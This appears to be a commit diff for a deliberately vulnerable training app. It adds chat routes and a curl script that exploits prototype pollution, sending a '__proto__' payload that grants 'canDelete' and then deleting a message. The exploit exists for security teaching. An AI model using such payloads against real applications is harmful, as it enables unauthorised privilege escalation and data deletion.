feat: prototype-pollution vulnerable chat app (snyk-labs#575)

app.js

@@ -56,6 +56,9 @@ app.get('/edit/:id', routes.edit);
 app.post('/update/:id', routes.update);
 app.post('/import', routes.import);
 app.get('/about_new', routes.about_new);
+app.get('/chat', routes.chat.get);
+app.put('/chat', routes.chat.add);
+app.delete('/chat', routes.chat.delete);
 // Static
 app.use(st({ path: './public', url: '/public' }));
 

exploits/prototype-pollution.sh

@@ -0,0 +1,38 @@
+# Working via curl
+
+if [ -z "$GOOF_HOST" ]; then
+    export GOOF_HOST=http://localhost:3001
+fi
+
+# Read messages
+c1()
+{
+    curl --request GET --url "$GOOF_HOST/chat"
+}
+
+# Send message
+c2()
+{
+    curl --request PUT \
+      --url "$GOOF_HOST/chat" \
+      --header 'content-type: application/json' \
+      --data '{"auth": {"name": "user", "password": "pwd"}, "message": {"text": "Hi!"}}'
+}
+
+# Gain permissions
+c3()
+{
+    curl --request PUT \
+      --url "$GOOF_HOST/chat" \
+      --header 'content-type: application/json' \
+      --data '{"auth": {"name": "user", "password": "pwd"}, "message": { "text": "😈", "__proto__": {"canDelete": true}}}'
+}
+
+# Delete message
+c4()
+{
+    curl --request DELETE \
+      --url "$GOOF_HOST/chat" \
+      --header 'content-type: application/json' \
+      --data '{"auth": {"name": "user", "password": "pwd"}, "messageId": 1}'
+}